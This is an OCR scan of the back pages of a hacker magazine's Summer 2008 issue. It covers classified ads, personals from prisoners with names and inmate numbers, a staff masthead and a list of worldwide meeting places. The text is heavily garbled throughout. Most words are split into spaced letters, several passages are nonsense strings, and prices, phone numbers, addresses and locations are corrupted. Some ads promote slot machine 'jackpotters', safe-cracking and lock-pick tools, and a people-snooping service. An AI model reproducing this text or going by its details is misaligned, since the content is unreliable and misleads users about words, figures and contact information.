http: //www.J I NX. com. Uber-Secret-Speci al -Mega Promo: Use
"2600v2 5no2" and get 1 0% off of your order.
VENDI NG MACHI NE JACKPOTTERS. Go to
www. hackershomepage. com for Vendi ng & Sl ot Machi ne Jack
potters, Safe Crackers, lock Pi cks, Phone Devi ces & Controver
si al Hacki ng Publ i cati ons.
NET DETECTIVE. Whether you' re j ust cur i ous, tryi ng to l ocate
or find out about peopl e for personal or busi ness reasons, or
you're l ooki n for peopl e you've fal l en out of touch wi th, Net
Detective makes i t a l l possi bl e! Net Detective i s used worl d
wi de by pri vate i nvestigators and detectives, as wel l as everyday
peopl e who use i t to find l ost rel ati ves, old high school and army
buddi es, deadbeat parents, l ost loves, people that owe them
money, and j ust pl ai n old snoopi ng around. Vi si t us today at
www.netdetecti ve. org. uk.
NETWORKI NG AND SECURITY PRODUCTS avai l abl e at
Ovat i onTechnol ogy. com. We're a suppl i er of Network Secu
ri ty and I nternet Pri vacy products. Our on l i ne store feat ures
VPN and fi rewa l l hardware, wi rel ess hardware, cable and DSL
modems/routers, I P access devi ces, Vol P products, parental
control products, and ethernet swi tches. We pri de oursel ves on
provi di ng the hi ghest l evel of techni cal experti se and customer
sati sfacti on. Our commi tment to you . . . No surpri ses! Buy wi t h
confi dence! Securi ty and Pri vacy i s our busi ness! Vi si t us at
http: //www. Ovati onTechnol ogy.com/store. ht m.
REAL WORLD HACKI NG: I nterested i n rooftops, steam t unnel s,
and the l i ke? Read the al l -new Access A
ll
Areas, a gui debook to
the art of urban expl orati on, from the author of In
f
i
l
tration zi ne.
Send $20 postpai d i n the US or Canada, or $2. overseas, to
PO Box 1 3, Stati on E, Toronto, ON M6H 4E 1 , Canada, or order
onl i ne at www. i nf i l trat i on. org.
lKttlLA lLMMAtON DVD! Years i n the maki ng but we
hope i t was worth the wai t. A doubl e DVD set that i ncl udes
the two hour documentary, an i n-depth i nterview wi th Kevi n
Mi t ni ck, and nearl y t hree hours of extra scenes, l ost footage,
and mi scel l aneous stuff. Pl us capti oni ng for 20 (that's ri ght,
20) l anguages, commentary track, and a l ot of t hi ngs you' l l j ust
have to fi nd for yoursel f! The ent i re two disc set can be had by
sendi ng $., 0 to Freedom Downti me DVD, PO Box 752, Mi ddl e
I sl and, NY 1 1 953 USA or by order i ng from our onl i ne store at
http:/store. 2 600. com. ( VHS copi es of the fi l m sti l l avai l abl e for
$ 1 5. )
Help Wanled
LOOKI NG FOR HElP from anyone in the wr i t i ng of a proposal
to hel p me try to rei nstate personal computers i n the East J ersey
State Prison in Rahway, New Jersey. We are operat i ng under
a new commi ssi oner si nce the computers were taken away
in 1 995 due to pol i cy revi si ons for no reason at al l . I f anyone
knows someone that knows someone that knows the commi s
si oner of the New Jersey State Pri sons, we seek your hel p i n t hi s
matter. I am al so l ooki ng for anyone who i s wi l l i ng to hel p me
wi t h my programmi ng ski l l s. Anyt hi ng wi l l be a pl us. Contact
i nfo: Akmed R. Fl u ker, 467096/853803A, Lock Bag R, Rahway,
New J ersey 07065. Peace and brotherhood to a l l .
RENEGADE BLACK SHEEP TECH ENTREPRENEUR i n process
of putt i ng flesh on the bones of an encrypted voi ce commu
ni cati ons project. Do you have experi ence i n the deep detai l s
of Vol P/SI P protocol s, network traffic anal ysi s, bi l l i ng system
constructi on, PtoP rout i ng, and so on? I nterested in worki ng wi t h
a top-end t eam to bui l d a worl d-changi ng t ool for regul ar fol ks
around the worl d to use in t hei r everyday l i ves? Contact me at
wr i nko@hushma i l . com.
Wamed
LOOKI NG FOR Zb READERS who wou l d l i ke to offer t hei r
servi ces for hi re. Want t o make money worki ng from home or on
the road, cal l ( 740) 544-6563 extensi on 1 0.
WANTED. Verified/veri fi abl e computer hacker. Wi l l pay $75 for
i ntervi ew to be used for future publ i cati on; ei ther on-the-record
or off-the-record. Response2600 (at) yahoo. com.
Seniees
HACKER TOOLS TREASURE BOX! You get over 660 l i nks
to key resources, _I us our proven methods for root i ng
out the hard-to-fi n tool s, i nst ant l y! Lets you bui l d your
own custom hacker ( AHEM, network securi ty) tool ki t.
http://FortressDataProtecti on. com/secur i tybook
GET A RAI SE AT WORK - BLOCK MORE SPAM. 5pamStopsHere
(www. spamstopshere. com) is the premi er sol uti on to hel p you
i mprove your boss' opi ni on of you, or hel p you keep spam
away from your own busi ness. I t wi l l hel p you bl ock over 99%
of spam "out of the box" and has vi rt ual l y no fal se posi ti ves. I t
requ i res no tun i ng, other than havi ng your users send any spar
that does manage to get through to a speci al e-mai l address. so
i t too gets bl ocked for al l of SpamStopsHere's cl i ents. Because
of the methodol ogy used, even medi cal groups and l aw fi rms,
the two hardest types of organi zati ons to spam fi l ter, can get
great success. I 've been usi ng the servi ce mysel f for two years
at my empl oyer, and have personal l y had two fal se posi ti ves i n
Pa
g
e 62
2600 Ma
g
azine
t hat t i me, wi th h' of the ma i l my organi zat i on recei vps bei ng
spam. I n the ev('nt t hat t her e i s a fa l se posi t i ve, your users can
fi nd out il bout i t thCmsel vps and retri eve i t thpmspl vps. The
-t rvi c' | - r1 | -o Gl pibl p Cl || Ct|| n_ v| u-c-, put t i ng anol hpr l i ne
of defense between a vi r us and your mdi l servers. The servi n'
ev('n i mproves e-mai l rel i Jbi l i ty wi th mul t i pl e-redundant servers
at l ocati ons around t h( ' U. S. , whi ( h JuIG-|t|t <l nd forward yCu
e-ma i l in thp ev('nt of a hardwire fai l u re on your ('nd. Hest of il l I ,
i t i s very ,lffordabl p, and offers a 30-day free tri a l . Reil i zi ng t haI
we'd be a _CCO mar ket f or t hem, I m,maged to negot i Jte a 1 5
pern'nt di scount off the pri ce of the servi ce for a 1 1 16U() read
rs.
Si mpl y contJct SPil n at sean@spamstopsherf' . com and mentI on
.|||AJJ.|nt to get your di scount .
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY
RELATED CRIME? Have an i dea, i nvent i on, or busi ness you want
to buy, sel l , protect, or market? Wi sh your attorney actua l l y under
stood you when you speak? The Law Office Ol Mi chael B. Green,
Esq. i s the sol uti on to your 21 st century l egal probl ems. Former
SysOp and member of many pri vate BBS's si nce 1 98 1 now avai l
abl e t o di rectl y represent you or bri dge t he communi cati ons gap
and assi st your current legal counsel . Extremel y detai l ed knowl
edge regardi ng cr i mi nal and ci vi l l i abi l i ty for computer and
technol ogy rel oted acti ons ( 1 8 USC 1 028, 1 02 9, 1 030, 1 03 1 ,
1 34 1 , 1 342, 1 343, 2 5 1 1 , 2 5 1 2, ECPA, DMCA, 1 996 Telecom
Act, etc. ) , domai n name di sputes, i ntel l ectual property matters
such as copyr i ghts, trademarks, l i censes and acqui si ti ons, a
wel l
as genera l busi ness and corporate l aw. Over 1 1 y
ars exp
.
enence
as i n-house legal counsel to a computer consul t i ng bUSi ness as
wel l as an over 20 year background i n computer, tel ecommuni
cati ons, and technol ogy matters. Publ i shed l aw revi ew arti cl es,
contri buted to nati onal l y publ i shed books, and submitted bri efs
to the Uni ted States Supreme Court on I nternet and technol ogy
rel ated i ssues. Admi tted to the u. S. Supreme Court, 2nd Ci rcui t
Court of Appeal s, and a l l New York State courts and fami l i ar
wi th other j uri sdi ct i ons as wel l . Many attorneys wi l l
.
t ake your
case wi thout any consi derati on of our cul ture and wi l l see you
merel y as a source of fees or worse, wi th i l l -concei ved prej u
di ces. My office understands our cul t ure, i s sympatheti c to your
si tuati on, and wi l l treat you wi th the respect and understandi ng
you deserve. No fee for the i n i t i al and confi dent i al consul tati on
and, i f for any reason we cannot hel p you, we wi l l even try
.
to
fi nd someone el se who can at no charge. So you have nothi ng
to l ose and perhaps everyt hi ng to gai n by contact i ng us fi rst.
Vi si t us at: http://www. computorney. com or cal l 5 1 6-9WE- HELP
( 51 6-993-4357) .
HAVE A PROBLEM WI TH THE LAW! DOES YOUR LAWYER
NOT UNDERSTAND YOU! Have you been charged with a
computer rel ated cr i me? I s someone threateni ng to sue you
for somet hi ng technol ogy rel ated? Do you j ust need a l awyer
that understand I T and the hacker cul ture? I 've publ i shed and
presented at HOPE and Defeon on the l aw faci ng technol ogy
professi onal s and hackers al i ke. I ' m both a l awyer and an I T
professi onal . Admi tted to practi ce l aw i n Pennsyl vani a and New
Jersey. Free consu l tati on to 26UU readers. http:/muentzl aw. com
al ex@muentzl aw. com (2 1 5) 806-4383
PIMP YOUR WI RELESS ROUTER! http://packetprotector.org.
Add VPN, I PS, and web AV capabi l i ti es to your wi rel ess router
with free, open-source fi rmware from PcketProtector.org
ADVANCED TECHNICAL SOLUTI ONS. #422 1 755 Robson
Street, Vancouver, B. C. Canada V6G 3 B7. Ph: (604) 928-0555.
El ectroni c countermeasures - f i nd out who i s secret l y vi deo
tapi ng you or buggi ng your car or offi ce. "State of the Art" detec
tion equ i pment uti l i zed.
I NCARCERATED ZbMEMBER NEEDS COMMUNITY HELP to
bui l d content in free cl assi fi ed ad and "l ocal busi ness di rectory"
in 50 countri es. John Lambros, the founder of Boycott Brazi l ,
has l aunched a F RE E cl assi fi ed ad, want ad, and l ocal busi ness
di rectory i n 50 gl obal markets. The mi ssi on i s si mpl e: "free el p
to bi l l i ons of peopl e l ocati ng j obs, housi ng, goods and serVI Ces,
soci al acti vi ti es, a gi rl fri end or boyfri end, communi ty i nforma
ti on, and j ust about anyth i ng el se i n over one mi l l i on nei gh
borhoods throughout the worl d - al l for FREE. HELP ME OUT!
SPREAD THE WORD! Pl ease vi si t www. NoPyCl assi fi eds. com
and add some content. I t wi l l take al l of fi ve or ten mi nutes. Li nks
to "No Py Cl assi fi eds" are al so greatl y appreci ated.
I NTELLI GENT HACKERS UNI X SHEll. Reverse. Net i s owned
and operated by i ntel l i gent hackers. We bel i eve every user has
the ri ght to onl i ne securi ty and pri vacy. In raday's host i l e anti
hacker atmosphere, i ntel l i gent hackers requi re the need for a
secure pl ace to work, compi l e, and expl ore wi thout bi g-brother
l ooki ng over thei r shoul der. Hosted at Chi cago Equi ni x wi th
j uni per Fi l tered DoS Protecti on. Mul t i pl e FreeBSD servers at P4
2 . 4 ghz. Affordabl e pr i ci ng from $5/month with a money back
guarantee. Li feti me 2 6% di scount for 26UU readers. Coupon
code: Save2600. http://www. reverse. net
AnnouncemenlS
C Ml MCCK i s the wepkl y one hour hilcker radi o show
presented Wedn('<d,lY ni ghts tt 7: 00 pm ET on WBAI '.'
FM in New York Ci tv. You Cdn il l so t une in over the net at
www. 2 600. com/offth0hook I Cn shortw.w(' i n Nor t h il nd South
Ameri ca at 74 1 5 khz. Archivps of al l shows dati ng hack to
1 'hh can b(' found ilt th(' .|! si tp i n mp' lt|u.+ | ' 'nCv- from
1 Q88-2006 are now tlvtl i l abl e i n DVD-R hi gh fi del i ty audi o for
onl y $ 1 0 a yeJr or $ 1 50 for a l i fet i me subscri pt i on. SE'nd check
l money ordpr to 2|0|I, || Box 7.2, Mi ddl e bl and, NY l ! ': !
USA or order t hrough our on l i ne store <I t http://l or(' . 2 6() O. com.
Your feedbick on the program i s al ways wel come t i t oth QI1 2 600.
com.
THE HACKERS YOUTUBE. Vi deo shori ng communi ty for
upl oadi ng and watchi ng streami ng hacki ng, modrl i ng, and
underground vi deos t hat the commun i ty can rel y on to del i ver
qual i ty content to anyone wi l l i ng to take the ti me to l earn.
http://www. veryangrytoad. com
THE HI GH WEI RDNESS PROJECT. We are t SubGpn i us wi ki
seeki ng submi ssi ons of strange, controversi al , subversi ve,
and above a l l Sl ackfu l sources of i nformat i on. We do not
fol l ow a so-cal l ed "neutral poi nt of vi ew" - pl ease make your
entri es as bi ased as you want, as l ong as t hey're i nterest i ng!
Speci al secti ons dedi cated to i nformati on warfare, software,
conspi raci es, rel i gi on and skept i ci sm, and morc. Check us out:
www. modemac. com.
PHONE PHUN. http://phonephun. us. Bl og devoted to i nter
est i ng phone numbers. Share your fi nds!
Personals
COUNTER-I NTElLI GENCE, HACKI NG, computer rcl otcd
countermeasures. Former i ntel l i gence officer i nterested in new
computer rel ated technol ogy. I n search of friends, contacts, and
worl dwi de penpal s any age, race, or or i ent at i on. I f possi bl e,
i ncl ude photo wi t h letter. No nudi ty, pol aroi ds, or i nmate mai l .
Spani sh or Engl i sh OK. I purchase magazi nes, hooks, unusual
pi ctures wi th my own funds. WM, 6', 1 80, bl onde, brown - wi l l
respond t o a l l . I nterested i n i nfo on fi nanci al pri vacy, offshore
trusts, hacki ng, and counteri ntel l i gence. D. Coryel l , T-681 2 7,
PO Box 8504, D3- 247up, Coal i nga, CA 932 1 0.
WHEN THE BULLET HI TS THE BONE. Change of address. If
you tri ed to send mai l and it got retured, that's why. Bored and
l onel y phone nerd wi th some t i me left i n our nat i on's wonderfu l
correcti ons system. Sti l l l ooki ng for pen pal s to hel p me pass
the ti me. Wi l l respond to al l . I nterests i ncl ude but not l i mi ted
to tel ecom, computers, pol i t i cs, musi c, tats, urban expl orati on,
el ectroni cs. I ' m a 2 3 yrs whi te mal e, bl ack hai r, green eyes.
Some tats. Mi chael Kerr 09496-029, FCI Oxford, PO Box 1 000,
Oxford, WI 53952.
ZJ YEAR OLD SERVI NG Z YEARS i n Sheri dan, Oregon for
hacki ng i nto AT&T pl us many other Vol P provi ders. Fi rst to be
charged with Vol P cri mes. Featured on America's Most Wanted
with K. Mi t ni ck. Looki ng for ANYONE to write me. Check freer
obert. com for more i nfo.
GAY PRI SONER SEEKS FRI ENDS to hel p wi th book revi ew
l ookups on Amazon by keywords. Com Sci maj or, thi rsty to
catch up to the real worl d before my reentry. I have my own
funds to buy books. I onl y need revi ews. I ' m MUD/MMORPG
savy i n C++, j ava, Python, PHP, MySQL, Di rectX. Ken Roberts
j 60962, 450-1 -2 8M, PO Box 9, Avenal , CA 93204.
OFFLI NE OUTlAW I N TEXAS needs some hel p i n devel opi ng
programmi ng ski l l s. Interested i n Perl and j avascr i pt. Al so pri vacy
i n a l l areas. Li brary here i s i nadequate. Feel free to drop those
Bi l l Me Later cards, add me to the mai l i ng l i sts, etc. . Thanks to
a l l those who have hel ped me so much al ready, you know who
you are. Wi l l i am Li ndl ey 822934, CT Terrel l , 1 300 FM 655,
Rosharon, TX 77583-8604
ONLY SUBSCRI BERS CAN ADVERTI SE I N Zb Don't even
t hi nk about tryi ng to take out an ad unl ess you subscri be! Al l
ads ar e free and there i s no amount of money we wi l l accept
for a non-subscri ber ad. We hope that's cl ear. Of course, we
reserve the ri ght to pass j udgment on your ad and not pri nt
i t i f i t' s amazi ngl y stupi d or has nothi ng at al l to do wi th the
hacker worl d. We make no guarantee as to the honesty, ri gh
teousness, sani ty, etc. of the peopl e advert i si ng here. Contact
them at your peri l . Al l submi ssi ons are for ONE I SSUE ONLY!
I f you want t o run your ad more t han once you must resubmi t
i t each ti me. Don' t expect us to run more than one ad for you
in a si ngl e i ssue ei ther. I ncl ude your address l abel /envel ope
or a photocopy so we know you're a subscri ber. Send your ad
to 26UU Marketpl ace, PO Box 99, Mi ddl e I sl and, NY 1 1 953.
Deadline or Autumn issue: /Z5/0.
Summer 2008 g
e 63
The 900 page col l ect i on of hi ghl i ghts from our
24 years of publ i shi ng i s now out , i ncl udi ng
al l sorts of new commentary t o go al ong wi th
the hi stori c mat eri al . Publ i shed by Wi l ey and
avai l abl e at bookstores everywhere, obtai nabl e
vi a amazon. com, bn. com, borders. com, and
countl ess other si tes throughout the worl d.
Pa
g
e 64 2600 Ma
g
azine
'There's no place like HOPE "
- random Last HOPE attendee, I:
STAFF
Edi tor-I n-Chi ef
Emmanuel Gol dstei n
Associ ate Edi tor
Mi ke Castl eman
Layout and Desi gn
Skram
Cover
Dabu Ch' wal d
Offi ce Manager
Tampruf
Writers: Berni e S. , Bi l l sf, Bl and Inqui si tor,
Eri c Corl ey, Dragorn, Paul Estev, Mr. French,
Javaman, Joe630, Graverose, Ki ngpi n,
Kn1 ghtl Ord, Kevi n Mi tni ck, The Prophet,
Redbi rd, Davi d Ruderman, Screamer
Chaoti x, Si l ent Swi tchman, StankDawg,
Mr. Upsetter
I T Operati ons: css, Jui ntz
I RC Admi ns: beave, mangal a, koz, rOd3nt
Broadcast Coordi nators: Jui ntz, thai
2 (ISSN 0749-3851, USPS # 003- 1 76);
Summer 2008, Volume 25 Issue 2, is
published quartery by 2600 Enterprises Inc. ,
2 Flowerield, St. James, NY 1 1 780.
Periodical postage rates paid at
St. James, NY and additional mailing
ofces.
POSTMASTER:
Send address changes to: 2600
PO. Box 752 Mi ddl e I sl and,
NY 1 1 953-0752.
SUBSCRI PTI ON CORRESPONDENCE:
2600 Subscri pti on Dept . , P. O. Box 752,
Mi ddl e I sl and, NY 1 1 953-0752 USA
(subs@2600. com)
I nspi rati onal Musi c: Kyl i e Mi nogue,
Anti -Fl ag, Adam Green, Phat head/Ogun,
The Al bum Leaf, Mul l yman, Steve Earl e,
Luci enne Boyer, Tyree Col i on, El l i ott Smi t h,
DJ Shadow, Mi key Dread
Shout Outs: Al ai n Muel l er, Brauerei
Loscher, AI and Zach, the AMD team,
the Wi l ey crew, WKKX i n Wheel i ng, Cory
Doctorow, Lexi con, Daravi nne, aesteti x,
Al pha Centauri , Marc Tobi fS, Phi l Torrone,
Rat Man, Froggy
RI P: Art hur C. Cl arke, Hopscotch
YEARLY SUBSCRI PTIONS:
U. S. and Canada $24 i ndi vi dual ,
$50 corporate (U. S. Funds)
Overeas $34 i ndi vi dual , $65 corporate
Back i ssues avai l abl e for 1 984-2007 at
$25 per year, $34 per year overseas
I ndi vi dual i ssues avai l abl e from 1 988 on
at $6. 25 each, $8. 50 each overseas
LETTERS AND ARTICLE
SUBMISSIONS:
2600 Edi tori al Dept . , PO. Box 99,
Mi ddl e I sl and, NY 1 1 953-0099 USA
(l etters@2600. com, arti cl es@2600. com)
2 OfiLe Line: +1 631 751 2600
2 Fax Line: +1 631 474 2677
Copyri ght 2008; 2600 Enterpri ses I nc.
Summer 200B
Pa
g
e 65
ARGENTINA
Buenos Ai res: The "Cruzat Beer
House" bar, Sarmi ento 1 61 7 (fi rst
floor, Paseo La Pl aza) .
AUSTRALIA
Melbourne: Caffei ne at ReVaul t
Bar, 1 6 Swanston Wa l k, near
Mel bourne Centra l Shoppi ng
Centre. 6: 30 pm
Sydney: The Crystal Pl ace, front
bar/bistro, opposi te the bus stati on
area on George St at Centra l
Stati on. 6 pm
AUSTRIA
Graz: Cafe Hal testel l e on
J akomi ni pl atz.
BRAZI L
Belo Horizonte: Pel ego's Bar at
Assufeng, near the payphone.
6 pm
CANADA
Alberta
Calgary: Eau Cl ai re Market food
court by the bl and yel l ow wal l .
6 pm
British Columbia
Victoria: QV Bakery and Cafe,
1 701 Government St.
Manitoba
Winnipeg: St. Vital Shoppi ng
Centre, food court by HMV.
New Brunswick
Moncton: Champl ai n Mal l food
court, near KFC. 7 pm
Ontario
Barrie: Wi l l i am's Coffee Pub, 505
Bryne Dr. 7 pm
Guel ph: Wi l l i am's Coffee Pub,
492 Edi nbourgh Rd 5. 7 pm
a
Mb
e` ';dff
l a
z
a,
6: 30 pm
Toronto: Free Ti mes Cafe, Col l ege
and Spadi na.
Windsor: Uni versi ty of Wi ndsor,
CAW Student Center commons
area by the l arge wi ndow. 7 pm
Quebec
Montreal: Bel l Amphi theatre,
1 000, rue de l a Gaucheti ere.
CHI NA
Hong Kong: Pci fi c Coffee i n
Festi va l Wa l k, Kowl oon Tong.
7 pm
CZECH REPUBLI C
Prague: Legenda pub. 6 pm
DENMARK
Aalborg: Fast Eddi e's pool hal l .
Aarhus: I n t he fa r corner of the
DSB cafe i n the ra i lway stati on.
Copenhagen: Cafe Bl asen.
Sonderborg: ColcDrll en. 7: 30 pm
EGYPT
Port Said: At the foot of the
Ob" l i , k l EI Mi ssal l ahl .
ENGLAND
Brighton: At the phone boxes by
t he' Sea l i fe' C{' nt re ( across tht> road
from the Pa l ace Pi pr) . Payphone:
( 01 2 73 ) 606674. pm
Exeter: At the p,lyphon('s, Bpdford
Square. 7 pm
Kent: At the end of th{' bu stati on
opposi te Wi l ki nsons, Canterbury.
6: 30 pm
London: Trocadero Shoppi ng
Cent er ( near Pi ccadi l l y C. ou-) ,
lowest l evel . 6: 30 pm
Manchester: Bul l s Head Pub on
London Rd. 7: 30 pm
Norwich: Borders entrance to
Charel fi el d Ma l l . n pm
Reading: Afro Bar, Merchants
Pl ace, off Fri :i
A
6r
D
m
Helsinki: Fenni akorttel i food court
(Vuori katu 1 4) .
FRANCE
Grenoble: Eve, campus of St.
Martin d' Heres. 6 pm
Li l le: Grand-Pl ace ( Pl ace Charl es
de Gaul l e) in front of the Furet du
Nord bookstore. 9 pm
Pris: Pl ace de la Republ i que,
near the (empty) fou ntai n . 6: 30
pm
Rennes: I n front of the store " Bl ue
Box" dose to Pl ace de la Repub
l i que. 8 pm
GREECE
Athens: Outsi de the bookstore
Pa pasot i nou on the corner of Pat i
si on and Stournari . 7 pm
I RELAND
Dublin: At the phone booths on
Wi ckl ow St besi de Tower Records.
7 pm
ITALY
Milan: Pi azza Loreto in front of
McDonal ds.
JAPAN
Tokyo: Li nux Cafe in Aki habara
di stri ct. 6 pm
NEW ZEALAND
Auckland: London Bar, upstai rs,
Wel l esl ey St, Auckl and Central .
5: 30 pm
Christchurch: J ava Cafe, corner of
Hi gh St and Manchester St. 6 pm
Wellington: Load Cafe in Cuba
Mal l . 6 pm
MEXICO
Mexico City: "Zocal o" Subway
Stati on ( Li ne 2 of the "METRO"
subway, the bl ue one) . At the
"Departamento del Di stri to
Federal " exi t, near the payphones
and the candy shop, at the begi n
n i ng of t he "Zocal o-Pi no Suarez"
tunnel .
NORWAY
Oslo: Osl o Sentra l Tra i n Stat i on.
7 pm
Tromsoe: The upper fl oor at Bl aa
Rock Cafe, Strandgata 1 4. 6 pm
Trondheim: Ri ck's Cafe i n
Nordregate. 6
RU
Lima: Barbi l oni a (ex Apu Bar), en
Al canfores 455, Mi raflores, at the
end of T arata St. 8 pm
SCOTlAND
a
o
s
i:m 1 .
7 pm
SOUTH AFRICA
Johannesburg (Sandton City):
Sandton food court. 6: 30 pm
SWEDEN
Gothenburg: 2nd fl oor i n BurgE'r
ko
n
6tsdava.
SWITZERLAND
Lausanne: I n front of the MaeDo
besi de the tra i n stat i on. 7 pm
UNI TED STATES
Alabama
Auburn: The student l ounge
upstai rs in the Foy Uni on
i
.fi.:; nl i eo's Sub Vi l l a on
Jorda n Lane.
Tuscaloosa: McFar l and Mal l food
court near the front entra nce' .
Arizona
Phoenix: Unl i mi ted Coffee ( 741 |.
Gl t> ndal e Awl. 6 pm
Tucson: Borders i n the Pa rk Mal l .
7 pm
California
Irvine: PanNJ Bread, 3988
Barri.1nCa Parkway. 7 pm
Los Angeles: Uni on Stat i on,
corner of Miley &Al dmcda. l nsi rll
mai n entrance by bank of phones.
PaYrhom.s: , 2 J 3 i 'J 2 -'JS J 9, 920,
625- 9923, 9924; 6 1 3
-
9704, 9746.
Monterey: Mucky Duck, 479
Al varado St. 5: 30 pm.
Sacramento: Round Tabl e Pi zza
at 1 2 7 K St.
San Diego: Regents Pi zza, 41 50
Regents Park Row #1 70.
San francisco: 4 Embarcadero
Pl aza ( i nsi de) . 5: 30 pm
San Jose: Outsi de t he cafe at t he
MLK Li brary at 4t h and E San
Fernando. 6 pm
Colorado
Boulder: Wi ng Zone food court,
1 3th and Col l ege. 6 pm
Lakewood: Barnes and Nobl e i n
the Denver West Shoppi ng Center,
1 4347 W Col fax Ave.
District of Columbia
Arlington: Pentagon Ci ty Mal l by
the pfone booths next to Pnda
Express. 6 pm
Florida
Ft. Lauderdale: Broward Mal l i n
the food court. 6 pm
Gainesvi l le: I n the back of the
Uni verSi ty of Fl ori da
'
s Rei tz Uni on
food court. 6 pm
Melbourne: House of J oe Coffee
House, 1 220 W New Haven
Fashi on Square Mal l
Food Court between Hovan
Gourmet and Manchu Wok. 6 pm
Tampa: Uni versi ty Ma l l in the
bacl of the food court on the 2nd
floor. 6 pm
Atlanta: Lenoe:'l
i
food court.
7 pm
Idaho
Boise: BSU Student Uni on
Bui l di ng, upstai rs from the mai n
entrance. Pyphones: ( 208)
342-9700, 970l .
Pocatello: Col l ege Market, 604
5 8th 51.
I l l i nois
'I
a
ib
i
".
h
,
k
and
Rd. 7 pm
I ndiana
Evansville: Barnes and Noble cafe
at 624 S Green River Rd.
Ft. Wayne: Gl enbrook Mal l food
court in front of Sbarro's. 6 pm
I ndianapolis: Mo' J oe Coffee
House, 2 2 2 W Mi chi gan St.
South Bend (Mishawaka): Barnes
and Nobl e cafe, 4601 Grape Rd.
Iowa
Ames: Memori a l Uni on Bui l di ng
food court at t he I owa State
Uni versi ty.
Kansas
rk
sa
al
i
"
d Prk): Oak
Wichita: Ri versi de Perk, 1 1 44
Bi tti ng Ave.
Louisiana
Baton Rouge: In the LSU Uni on
Bui l di ng, between t he Ti ger Puse
& McDonal d's. 6 pm
New Orleans: Z' otz Coffee House
uptown at 82 1 0 Oak St. 6 pm
Maine
Portland: Mai ne Ma l l by the
bench at the food court door.
Maryland
Baltimore: Bares & Nobl e cafe at
the I nner Harbor.
Massachusetts
Boston: Prudent i al Center Pl aza,
tprr(lce food court at the tabl es
near the wi ndows. 6 pm
Marlborough: Sol omon Park Mal l
food court. 6 pm
Northampton: Downsta i rs of
Hayma rket Cafe. 6 pm
Michigan
Ann Arbor: Starbucks i n The
Gal l eri a on S Uni versi ty.
Minnesota
Bloomington: Ma l l of Ameri ca,
north si de food court , across
from Burger Ki ng & the bank
of payphones that don't take
i ncomi ng cal i s.
Missouri
Kansas City ( I ndependence):
Barnes & Noble, 1 9 1 20 E 39th St.
St. Louis: Gal l eri a Food Court.
Springfield: Borders Books and
Musi c cof feeshop, 3300 S Gl en
stone Ave, one bl ock sout h of
Bat t l efi el d Ma l l . 5: 30 pm
Nebraska
Omaha: Crossroads Mal l Food
Court. 7 pm
Nevada
Las Vegas: reJAVAnate Coffee,
3300 E Fl ami ngo Rd (at Pecos).
7 pm
New Mexico
Albuquerque: Uni verSi ty of New
Mexi co Student Uni on Bui l di ng
( pl aza "I ower" l evel l ounge),
mai n campus. Payphones:
505-843-9033, 505-843-9034.
5: 30 pm
NewVork
New York: Ci ti group Center, in the
l obby, near the payphones, 1 53 E
53rd St, between Lexi ngton & 3 rd.
Rochester: Pnera Bread, 2 3 73 W
Ri dge Rd. 7: 30 pm
North Carolina
Charlotte: South Park Mal l food
court. 7 pm
Raleigh: Roya l Bean coffee shop
on Hi l l sboro St (next to the Pl ay
makers Sports Ba and across from
Meredi th Col l ege).
Wi l mi ngton: The Connecti on
I nternet Cafe, 2 50 1 Raci ne Drive,
Raci ne Commons Shoppi ng
Center.
North Dakota
Fargo: West Acres Mal l food court
by the Taco J ohn's. 6 pm
Ohio
Cincinnati: The Brew House, 1 047
E McMi l l an. 7 pm
Cleveland: Uni versi ty Ci rcl e
Arabi ca, 1 1 300 J uni per Rd.
Upstai rs, turn ri ght, second room
on left.
Columbus: Conventi on center on
street l evel around the corner from
the food court.
Daylon: TGI Fri day's off 725 by
the Dayton Ma I I .
Oklahoma
Oklahoma City: Cafe Bel l a,
southeast cor ner of SW 89t h St
and Penn.
Tulsa: Promenade Mal l food court.
Oregon
Portland: Backspace Cafe, 1 1 5
NW 5th Ave. 6 pm
Pennsylvania
Allentown: ?nera Bread, 3 1 00 W
Ti l ghman 51. 6 pm
Harrisburg: Pnera Bread, 4263
Un i on Derosi t Rd. 6 pm
Phi ladelphia: 30th St Stati on,
southeast food court near mi ni
post offi ce.
South Carol ina
Charleston: Northwoods Mal l
i n the hal l between Sears and
Chi k-Fi l -A.
South Dakota
Sioux Falls: Empi re Mal l , by
Burger Ki ng.
Tennessee
Knoxville: Borders Books Cafe
across from Westown Mal l .
Memphis: Quetzal , 664 Uni on
h.iG Vanderbi l t Uni versi ty
Hi l l Center, Room 1 5 1 , 1 23 1 1 8th
Ave S. 6 pm
Texas
r
n
t,
s
ft r
s
:c
'
f
8
-Tnfa's Express in front
of Nordstrom's in the Gal l eri a
Mal l .
San Antonio: North Star Mal l food
court. 6 pm
Utah
Salt Lake City: ZCMI Mal l i n The
Prk Food Court.
Vermont
h
t
S
t
n
d
o
!
n
a
t
t
he
second fl oor of the cafe.
Virginia
Arlington: (see Di stri ct of
Col umbi a)
Charlottesville: Panera Bread
at the Barracks Road Shoppi ng
Center. 6: 30 pm.
Virgi nia Beach: lxnnhaven Mal l
on Lynnhaven Parkway. 6 pm
Washington
tt
n:
s
1
e
,
t
h
onven
-
si de. 6 pm
Spokane: Coffee Station, 93 1 5 N
Nevada ( North Spokane). 6 pm
Wisconsin
Madison: Fai r Trade Coffee House,
4 1 8 State St.
AhmPPn lakPlaCP 0n lhP
Hr$l ry 0l P m0nlh.
LnlP$$0lhPrw$Pn0lPd, lhPy
$larlal5
]
m l0CallmP. 0 $larl
a mPPlm_n
)
uurClj$Pnd
Pmal l0 mPPlln_SZb.C0m.
Pa
g
e 66
2600 Ma
g
azine